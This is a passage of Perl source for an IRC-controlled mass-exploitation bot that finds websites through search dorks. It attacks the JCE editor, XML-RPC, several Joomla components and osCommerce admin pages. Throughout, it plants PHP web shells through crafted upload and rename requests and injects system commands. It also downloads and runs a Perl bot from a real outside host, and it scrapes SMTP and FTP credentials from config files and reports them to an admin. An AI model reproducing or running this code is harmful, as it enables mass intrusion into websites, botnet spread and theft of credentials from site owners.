sleep(2); &msg("$chan","$jcelogo4,1 send to $nick 0,1 $safe $os "); sleep(2); &carismtp($petx,$chan,$site,$engine,$jcelogo); } if($colong =~ /HACKERMIND/i){ if ($colong =~ m/SAFE_MODE : (.*?)<\/b>/) {$safe = $1;} if ($colong =~ m/Uname : (.*?)<\/b>/){$os=$1;} if ($colong =~ m/Uid : (.*?)<\/br>/) {$id = $1;} &msg("$admin","$jcelogo4,1$engine 0,1$petx2 $safe $os "); sleep(2); &msg("$chan","$jcelogo4,1 send to 0,1$safe $os "); sleep(2); &os3($petx,$chan,$engine,$jcelogo,$nick); &carismtp($petx,$chan,$site,$engine,$jcelogo); } if($colong2 =~ /UnKnown - Simple Shell/i){ if ($colong2 =~ m/SAFE_MODE : (.*?)<\/b>/) {$safe = $1;} if ($colong2 =~ m/Uname : (.*?)<\/b>/){$os=$1;} if ($colong2 =~ m/Uid : (.*?)<\/br>/) {$id = $1;} &msg("$admin","$jcelogo4,1$engine 0,1$explore2 $safe $os "); sleep(2); &msg("$chan","$jcelogo4,1 send to Gay $nick 0,1safe $os "); sleep(2); &carismtp($explore,$chan,$site,$engine,$jcelogo); } my $test = "http://".$site.$bug; my $coba = "http://".$site; if ($coba =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) { $hajarhome = $2; } my $shellz = "http://".$site."images/stories/magic.php"; my $shellx = "http://".$site."images/stories/magic.php.pHp"; my $crsmtp = "http://".$site."images/stories/magic.php?baca"; my $crsmtp2 = "http://".$site."images/stories/magic.php.pHp?baca"; my $crsmtp3 = "http://".$site."images/stories/magic.php.pHp?baca"; my $shellx2 = "http://".$site."images/stories/magic.php.pHp?"; my $fuck1 ="cruck://".$site."images/stories/magic.php.pHp"; my $fuck2 ="cruck://".$site."images/stories/magic.php.png"; my $fuck3 ="cruck://".$site."images/stories/magic.php"; my $fuck4 ="cruck://".$site."images/stories/magic.php.pHp"; my $fuck5 ="cruck://".$site."images/stories/magic.php.pHp"; &jce_cek_query($hajarhome); &jce_cek_queryx($hajarhome); sleep(2); my $fuck ="http://".$site."images/stories/magic.php.png"; my $fuckx ="http://".$site."images/stories/magic.php.png?baca"; my $cek = &get_content($fuck); my $cek1 = &get_content($fuckx); if($cek =~ /GIF89aG/i){ &msg("$chan","$jcelogo4,1Exploiting..."); &jce_cek_query2($hajarhome); &get_content($shell."?cmd=curl+-C+-+-O+http://www.mitranet.tv/wp-content/uploads/w4ck.log%3Bperl+w4ck.log%3Brm+w4ck.log;cd /tmp;wget http://www.mitranet.tv/wp-content/uploads/w4ck.log;perl w4ck.log irc.ashter.org;rm w4ck.log"); my $check = &get_content($shellz."?bajak"); if($cek1 =~ /BArNEr/i){ &msg("$admin","$jcelogo4,1$engine 0,1$fuck2 "); sleep(2); &os3($fuck,$chan,$engine,$jcelogo,$nick); &carismtp($fuckx,$chan,$site,$engine,$jcelogo); } if ($check =~ /BArNEr/i){ &os($shellz,$chan,$engine,$jcelogo,$nick); &msg("$admin","$jcelogo4,1$engine 0,1$fuck3 "); sleep(2); &carismtp($crsmtp,$chan,$site,$engine,$jcelogo); } &msg("$admin","$jcelogo4,1$engine 0,1<4,1=0,1>4,1 sHeLL 0,1<4,1=0,1>4,1 $shell20,1 cruck://".$site."/images/stories/magic.php4,1 (SafeMode=$safe) (OS=$os) uid=$uid "); &jce_cek_query3($hajarhome); my $check1 = &get_content($shellx."?bajak"); &jce_cek_query4($hajarhome); if ($check1 =~ /BArNEr/i){ &msg("$admin","$jcelogo4,1$engine 0,1$fuck4,1 "); sleep(2); &os2($shellx,$chan,$engine,$jcelogo,$nick); &carismtp($crsmtp2,$chan,$site,$engine,$jcelogo); } } } } sub jce_cek_queryx() { my $TARGET = $_[0]; ## Start Code ## $header1P = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1"; $header1P2 = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1"; $header2 = "Host: $TARGET"; $header3 = "User-Agent: BOT/0.1 (BOT for JCE)"; $header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334"; $header5 = "Content-Length: 2286"; #737 $header6 = "-----------------------------41184676334"; $header7 = 'Content-Disposition: form-data; name="upload-dir"'; $header8 = '/'; $header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""'; $header10 = 'Content-Type: application/octet-stream'; $header11 = 'Content-Disposition: form-data; name="upload-overwrite"'; $header12 = "0"; $header13 = 'Content-Disposition: form-data; name="Filedata"; filename="magic.php.png"'; $header14 = 'Content-Type: image/gif'; $header15 = 'GIF89aG'; $header16 = " "; $header17 = 'Content-Disposition: form-data; name="upload-name"'; $header18 = 'magic.php'; $header19 = 'Content-Disposition: form-data; name="action"'; $header20 = 'upload'; $header21 = "-----------------------------41184676334--"; $header22 = 'X-Request: JSON'; $header23 = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8'; $header25 = 'json={"fn":"folderRename","args":["/magic.php.png","magic.php.png"]}'; $header24 = "Content-Length: ".length($header25).""; ## EOF COde ## my $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"80") or return; print $remote "$header1P\n$header2\n$header3\n$header4\n$header5\n\n$header6\n$header7\n\n$header8\n$header6\n$header9\n$header10\n\n\n$header6\n$header11\n\n$header12\n$header6\n$header13\n$header14\n\n$header15\n$header16\n$header6\n$header17\n\n$header18\n$header6\n$header19\n\n$header20\n$header21\n\n"; sleep(5); print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n"; sleep(3); close($remote); } sub jce_cek_queryxx() { my $TARGET = $_[0]; ## Start Code ## $header1P = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1"; $header1P2 = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1"; $header2 = "Host: $TARGET"; $header3 = "User-Agent: BOT/0.1 (BOT for JCE)"; $header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334"; $header5 = "Content-Length: 2286"; #737 $header6 = "-----------------------------41184676334"; $header7 = 'Content-Disposition: form-data; name="upload-dir"'; $header8 = '/'; $header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""'; $header10 = 'Content-Type: application/octet-stream'; $header11 = 'Content-Disposition: form-data; name="upload-overwrite"'; $header12 = "0"; $header13 = 'Content-Disposition: form-data; name="Filedata"; filename="magic.php.png"'; $header14 = 'Content-Type: image/gif'; $header15 = 'GIF89aG'; $header16 = " "; $header17 = 'Content-Disposition: form-data; name="upload-name"'; $header18 = 'magic.php'; $header19 = 'Content-Disposition: form-data; name="action"'; $header20 = 'upload'; $header21 = "-----------------------------41184676334--"; $header22 = 'X-Request: JSON'; $header23 = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8'; $header25 = 'json={"fn":"folderRename","args":["/magic.php.png","magic.php.php"]}'; $header24 = "Content-Length: ".length($header25).""; ## EOF COde ## my $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"80") or return; print $remote "$header1P\n$header2\n$header3\n$header4\n$header5\n\n$header6\n$header7\n\n$header8\n$header6\n$header9\n$header10\n\n\n$header6\n$header11\n\n$header12\n$header6\n$header13\n$header14\n\n$header15\n$header16\n$header6\n$header17\n\n$header18\n$header6\n$header19\n\n$header20\n$header21\n\n"; sleep(5); print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n"; sleep(3); print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n"; sleep(3); close($remote); } sub jce_cek_queryx2() { my $TARGET = $_[0]; ## Start Code ## $header1P = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1"; $header1P2 = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1"; $header2 = "Host: $TARGET"; $header3 = "User-Agent: BOT/0.1 (BOT for JCE)"; $header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334"; $header5 = "Content-Length: 2286"; #737 $header6 = "-----------------------------41184676334"; $header7 = 'Content-Disposition: form-data; name="upload-dir"'; $header8 = '/'; $header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""'; $header10 = 'Content-Type: application/octet-stream'; $header11 = 'Content-Disposition: form-data; name="upload-overwrite"'; $header12 = "0"; $header13 = 'Content-Disposition: form-data; name="Filedata"; filename="magic.php.png"'; $header14 = 'Content-Type: image/gif'; $header15 = 'GIF89aG'; $header16 = " "; $header17 = 'Content-Disposition: form-data; name="upload-name"'; $header18 = 'magic.php'; $header19 = 'Content-Disposition: form-data; name="action"'; $header20 = 'upload'; $header21 = "-----------------------------41184676334--"; $header22 = 'X-Request: JSON'; $header23 = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8'; $header25 = 'json={"fn":"folderRename","args":["/magic.php.png","magic.php.pHp"]}'; $header24 = "Content-Length: ".length($header25).""; ## EOF COde ## my $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"80") or return; print $remote "$header1P\n$header2\n$header3\n$header4\n$header5\n\n$header6\n$header7\n\n$header8\n$header6\n$header9\n$header10\n\n\n$header6\n$header11\n\n$header12\n$header6\n$header13\n$header14\n\n$header15\n$header16\n$header6\n$header17\n\n$header18\n$header6\n$header19\n\n$header20\n$header21\n\n"; sleep(5); print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n"; sleep(3); close($remote); } sub jce_cek_queryx3() { my $TARGET = $_[0]; ## Start Code ## $header1P = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1"; $header1P2 = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1"; $header2 = "Host: $TARGET"; $header3 = "User-Agent: BOT/0.1 (BOT for JCE)"; $header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334"; $header5 = "Content-Length: 2286"; #737 $header6 = "-----------------------------41184676334"; $header7 = 'Content-Disposition: form-data; name="upload-dir"'; $header8 = '/'; $header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""'; $header10 = 'Content-Type: application/octet-stream'; $header11 = 'Content-Disposition: form-data; name="upload-overwrite"'; $header12 = "0"; $header13 = 'Content-Disposition: form-data; name="Filedata"; filename="magic.php.png"'; $header14 = 'Content-Type: image/gif'; $header15 = 'GIF89aG'; $header16 = " "; $header17 = 'Content-Disposition: form-data; name="upload-name"'; $header18 = 'magic.php'; $header19 = 'Content-Disposition: form-data; name="action"'; $header20 = 'upload'; $header21 = "-----------------------------41184676334--"; $header22 = 'X-Request: JSON'; $header23 = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8'; $header25 = 'json={"fn":"folderRename","args":["/magic.php.png","magic.php.pHp"]}'; $header24 = "Content-Length: ".length($header25).""; ## EOF COde ## my $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"80") or return; print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n"; sleep(3); print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n"; sleep(3); print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n"; sleep(3); print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n"; sleep(3); close($remote); } sub jce_cek_query() { my $TARGET = $_[0]; ## Start Code ## $header1P = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1"; $header1P2 = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1"; $header2 = "Host: $TARGET"; $header3 = "User-Agent: BOT/0.1 (BOT for JCE)"; $header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334"; $header5 = "Content-Length: 2286"; #737 $header6 = "-----------------------------41184676334"; $header7 = 'Content-Disposition: form-data; name="upload-dir"'; $header8 = '/'; $header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""'; $header10 = 'Content-Type: application/octet-stream'; $header11 = 'Content-Disposition: form-data; name="upload-overwrite"'; $header12 = "0"; $header13 = 'Content-Disposition: form-data; name="Filedata"; filename="magic.php.png"'; $header14 = 'Content-Type: image/gif'; $header15 = 'GIF89aG'; $header16 = " "; $header17 = 'Content-Disposition: form-data; name="upload-name"'; $header18 = 'magic.php'; $header19 = 'Content-Disposition: form-data; name="action"'; $header20 = 'upload'; $header21 = "-----------------------------41184676334--"; $header22 = 'X-Request: JSON'; $header23 = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8'; $header25 = 'json={"fn":"folderRename","args":["/magic.php.png","magic.php"]}'; $header24 = "Content-Length: ".length($header25).""; ## EOF COde ## my $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"80") or return; print $remote "$header1P\n$header2\n$header3\n$header4\n$header5\n\n$header6\n$header7\n\n$header8\n$header6\n$header9\n$header10\n\n\n$header6\n$header11\n\n$header12\n$header6\n$header13\n$header14\n\n$header15\n$header16\n$header6\n$header17\n\n$header18\n$header6\n$header19\n\n$header20\n$header21\n\n"; sleep(5); print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n"; sleep(3); close($remote); } sub jce_cek_query2() { my $TARGET = $_[0]; ## Start Code ## $header1P = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1"; $header1P2 = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1"; $header2 = "Host: $TARGET"; $header3 = "User-Agent: BOT/0.1 (BOT for JCE)"; $header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334"; $header5 = "Content-Length: 2286"; #737 $header6 = "-----------------------------41184676334"; $header7 = 'Content-Disposition: form-data; name="upload-dir"'; $header8 = '/'; $header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""'; $header10 = 'Content-Type: application/octet-stream'; $header11 = 'Content-Disposition: form-data; name="upload-overwrite"'; $header12 = "0"; $header13 = 'Content-Disposition: form-data; name="Filedata"; filename="magic.php.png"'; $header14 = 'Content-Type: image/gif'; $header15 = 'GIF89aG'; $header16 = " "; $header17 = 'Content-Disposition: form-data; name="upload-name"'; $header18 = 'magic.php'; $header19 = 'Content-Disposition: form-data; name="action"'; $header20 = 'upload'; $header21 = "-----------------------------41184676334--"; $header22 = 'X-Request: JSON'; $header23 = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8'; $header25 = 'json={"fn":"folderRename","args":["/magic.php.png","magic.php"]}'; $header24 = "Content-Length: ".length($header25).""; # EOF COde ## my $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"80") or return; print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n"; sleep(5); print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n"; print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n"; sleep(3); print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n"; close($remote); } sub jce_cek_query3() { my $TARGET = $_[0]; ## Start Code ## $header1P = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1"; $header1P2 = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1"; $header2 = "Host: $TARGET"; $header3 = "User-Agent: BOT/0.1 (BOT for JCE)"; $header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334"; $header5 = "Content-Length: 2286"; #737 $header6 = "-----------------------------41184676334"; $header7 = 'Content-Disposition: form-data; name="upload-dir"'; $header8 = '/'; $header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""'; $header10 = 'Content-Type: application/octet-stream'; $header11 = 'Content-Disposition: form-data; name="upload-overwrite"'; $header12 = "0"; $header13 = 'Content-Disposition: form-data; name="Filedata"; filename="magic.php.png"'; $header14 = 'Content-Type: image/gif'; $header15 = 'GIF89aG'; $header16 = " "; $header17 = 'Content-Disposition: form-data; name="upload-name"'; $header18 = 'magic.php'; $header19 = 'Content-Disposition: form-data; name="action"'; $header20 = 'upload'; $header21 = "-----------------------------41184676334--"; $header22 = 'X-Request: JSON'; $header23 = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8'; $header25 = 'json={"fn":"folderRename","args":["/magic.php.png","magic.php.pHp"]}'; $header24 = "Content-Length: ".length($header25).""; ## EOF COde ## my $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"80") or return; print $remote "$header1P\n$header2\n$header3\n$header4\n$header5\n\n$header6\n$header7\n\n$header8\n$header6\n$header9\n$header10\n\n\n$header6\n$header11\n\n$header12\n$header6\n$header13\n$header14\n\n$header15\n$header16\n$header6\n$header17\n\n$header18\n$header6\n$header19\n\n$header20\n$header21\n\n"; sleep(5); print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n"; sleep(3); close($remote); } sub jce_cek_query4() { my $TARGET = $_[0]; ## Start Code ## $header1P = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1"; $header1P2 = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1"; $header2 = "Host: $TARGET"; $header3 = "User-Agent: BOT/0.1 (BOT for JCE)"; $header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334"; $header5 = "Content-Length: 2286"; #737 $header6 = "-----------------------------41184676334"; $header7 = 'Content-Disposition: form-data; name="upload-dir"'; $header8 = '/'; $header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""'; $header10 = 'Content-Type: application/octet-stream'; $header11 = 'Content-Disposition: form-data; name="upload-overwrite"'; $header12 = "0"; $header13 = 'Content-Disposition: form-data; name="Filedata"; filename="magic.php.png"'; $header14 = 'Content-Type: image/gif'; $header15 = 'GIF89aG'; $header16 = " "; $header17 = 'Content-Disposition: form-data; name="upload-name"'; $header18 = 'magic.php'; $header19 = 'Content-Disposition: form-data; name="action"'; $header20 = 'upload'; $header21 = "-----------------------------41184676334--"; $header22 = 'X-Request: JSON'; $header23 = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8'; $header25 = 'json={"fn":"folderRename","args":["/magic.php.png","magic.php.pHp"]}'; $header24 = "Content-Length: ".length($header25).""; # EOF COde ## my $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"80") or return; print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n"; sleep(5); print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n"; print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n"; sleep(3); print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n"; close($remote); } sub carismtp() { my $url = $_[0]; my $chan = $_[1]; my $site = $_[2]; my $engine = $_[3]; my $logo = $_[4]; my $data = &get_content($url); my $psite = "http://".$site; if ($psite =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) { $host = $2; } if ($data =~ m/smtphost/g && $data =~ m/smtppass/g || $data =~ m/ftp_host/g ) { my $smtphost=""; my $smtpport=""; my $smtpuser=""; my $smtppass=""; if ($data =~ m/smtphost = '(.*)';/g) { $smtphost = $1; } if ($data =~ m/smtpport = '(.*)';/g) { $smtpport = $1; } if ($data =~ m/smtpuser = '(.*)';/g) { $smtpuser = $1; } if ($data =~ m/smtppass = '(.*)';/g) { $smtppass = $1; } if ($data =~ m/ftp_host = '(.*)';/g) { $ftp_host = $1; } if ($data =~ m/ftp_port = '(.*)';/g) { $ftp_port = $1; } if ($data =~ m/ftp_user = '(.*)';/g) { $ftp_user = $1; } if ($data =~ m/ftp_pass = '(.*)';/g) { $ftp_pass = $1; } &msg("$chan","$jcelogo(4,1$engine0,1) (4,1SMTP0,1:4,1$smtpuser0,1) (4,1FTP0,1:4,1$ftp_user)"); &msg("$admin","$jcelogo(4,1$engine0,1)4,1 SMTP: $site -4,1 $smtphost:$smtpport $smtpuser:$smtppass |0,1 ftp://$site -4,1 $ftp_host:$ftp_port $ftp_user:$ftp_pass "); sleep(5); &ftp_connect("http://target.com",$host,$ftp_user,$ftp_pass,$chan,$engine); sleep(2); } } sub xml_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$xmllogo,$nick); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$xmllogo4$engine14 Searching..."); } my $test = "http://".$site.$bug; my $vuln = "http://".$site."12".$bug; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $html = &get_content($test); if ($html =~ /faultcode/i ) { my $resp = &xml_cek_query($test); if ($resp =~ /j13mb0t(.*)j13mb0t/s) { &msg("$chan","$xmllogo4$engine 14http://$site"); sleep(2); &xml_spread_query($test);sleep(1); my $sys = $1; my $shell = "http://".$site."/magic.php"; my $shellx = "http://".$site."/cpx.php"; my $check = &get_content($shell);&get_content($shellx); if ($check =~ /BArNEr/i) { &os2($shell,$chan,$engine,$xmllogo,$nick); } } } exit; } } } }} sub xml_cek_query() { my $url = $_[0]; my $code = "system('uname -a');"; my $ua = LWP::UserAgent->new(agent => 'perl post'); $exploit = ""; $exploit .= "test.method"; $exploit .= "',''));"; $exploit .= "echo'j13mb0t';".$code."echo'j13mb0t';exit;/*"; $ua->timeout(7); my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit); return $res->content; } sub xml_spread_query() { my $xmltargt = $_[0]; my $xmlsprd = "system('wget ".$injector." -O magic.php;wget ".$botshell2." -O cpx.php;fetch ".$injector.";mv end.jpg magic.php;fetch ".$botshell2.";mv cpx.jpg cpx.php;wget ".$botshell." -O tmp.php;fetch ".$botshell.";mv end.jpg tmp.php;killall -9 perl;killall -9 php;cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php bot.txt;rm -rf end.jpg;wget ".$botshell.";php end.jpg;rm -rf end.jpg;curl -O ".$botshell.";php end.jpg;rm -rf end.jpg;lwp-download ".$botshell.";php end.jpg;cd /var/tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php end.jpg;rm -rf end.jpg;wget ".$botshell.";php bot.txt;rm -rf end.jpg;curl -O ".$botshell.";php end.jpg;rm -rf end.jpg;lwp-download ".$botshell.";php end.jpg;');"; my $userAgent = LWP::UserAgent->new(agent => 'perl post'); $exploit = ""; $exploit .= "test.method"; $exploit .= "',''));"; $exploit .= "echo'j13m';".$xmlsprd."echo'b0T';exit;/*"; $userAgent->timeout(7); my $response = $userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content => $exploit); } sub clip_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$cliplogo,$nick); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$cliplogo4,1$engine0,1 Searching..."); } my $test = "http://".$site.$bug."?name=magic.php"; my $test1 = "http://".$site.$bug."?name=magic.php.pHp"; my $cek1 = &get_content($test);&get_content($test1); if ($cek1 =~ /Saving your image to/i){ &msg("$chan","$cliplogo4,1$engine 0,1http://$site"); sleep(2); &jg_magic($test); &jg_magic($test1); my $shell = "http://".$site."admin_area/charts/tmp-upload-images/magic.php"; my $shellx = "http://".$site."admin_area/charts/tmp-upload-images/magic.php.pHp"; my $check = &get_content($shell); my $check2 = &get_content($shellx); if ($check =~ /BArNEr/i){ &os($shell,$chan,$engine,$cliplogo,$nick); } if ($check2 =~ /BArNEr/i){ &os2($shell,$chan,$engine,$cliplogo,$nick); } } } } } sub red_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$redlogo,$nick); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$redlogo4,1$engine0,1 Searching..."); } my $test = "http://".$site.$bug."?name=magic.php"; my $test1 = "http://".$site.$bug."?name=cpx.php"; my $cek1 = &get_content($test);&get_content($test1); if ($cek1 =~ /Saving your image to/i){ &msg("$chan","$redlogo4,1$engine 0,1http://$site"); sleep(2); &jg_magic($test); &jg_cps($test1); my $shell = "http://".$site."administrator/components/com_redmystic/chart/tmp-upload-images/magic.php"; my $shellx = "http://".$site."administrator/components/com_redmystic/chart/tmp-upload-images/cpx.php"; my $check = &get_content($shell);&get_content($shellx); if ($check =~ /BArNEr/i){ &os($shell,$chan,$engine,$redlogo,$nick); } } } } } sub live_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$livelogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$livelogo4,1$engine0,1 Searching..."); } my $test = "http://".$site.$bug."?name=magic.php"; my $test1 = "http://".$site.$bug."?name=cpx.php"; my $cek1 = &get_content($test);&get_content($test1); if ($cek1 =~ /Saving your image to/i){ &jg_magic($test); &jg_cps($test1); my $shell = "http://".$site."library/tmp-upload-images/magic.php"; my $shellx = "http://".$site."library/tmp-upload-images/cpx.php"; my $check = &get_content($shell);&get_content($shellx); if ($check =~ BArNEr/i){ &os($shell,$chan,$engine,$livelogo,$nick); } } } } } sub reflex_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$reflogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$reflogo4,1$engine0,1 Searching..."); } if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $cxshell = "http://".$site."/wp-content/uploads/magic.php"; my $reflex = "http://".$site.$bug; my $cek = &get_content($reflex);sleep(1); if ($cek =~ /No files were uploaded/i){ my $explo = $rceinjector."?url=".$site."&type=ref"; &get_content($explo);sleep(1); my $check = &get_content($cxshell."?shell");sleep(1); if ($check =~ /BArNEr/i){ &os($cxshell,$chan,$engine,$reflogo,$nick); } } } } } sub osco_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$oscologo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$oscologo4,$engine0,1 Searching..."); } my $cat = "http://".$site."admin/categories.php/login.php"; my $fm = "http://".$site."admin/file_manager.php/login.php"; my $bm = "http://".$site."admin/banner_manager.php/login.php"; my $pm = "http://".$site."admin/administrators.php/login.php"; my $shell = "http://".$site."images/mailer.php?sh"; my $shellx = "http://".$site."images/.images.php"; my $shell2 = "http://".$site."images/version.php"; my $shell3 = "magic://".$site."images/version.php?x=anonymous"; my $htaccess = "http://".$site."images/.htaccess"; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $coba = &get_content($cat);sleep(1); my $cob2 = &get_content($fm);sleep(1); my $cob3 = &get_content($bm);sleep(1); my $cob4 = &get_content($pm);sleep(1); if ($coba =~ /TABLE_HEADING_CATEGORIES_PRODUCTS/i ) { my $test = $cat."?action=download&filename=/includes/configure.php"; my $cek = &get_content($test); if ($cek =~ /http:\/\//) { &admin_osco($site,$chan,$engine); &osql_xpl($test,$chan,$site,$engine); } my $aplod = LWP::UserAgent->new; my $res = $aplod->post($cat."?cPath=&action=new_product_preview",['products_image' => ['./mailer.gif' => 'mailer.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res->as_string; my $resa = $aplod->post($cat."?cPath=&action=new_product_preview",['products_image' => ['./scam.gif' => '.images.php' => 'application/octet-stream']],'Content-Type' => 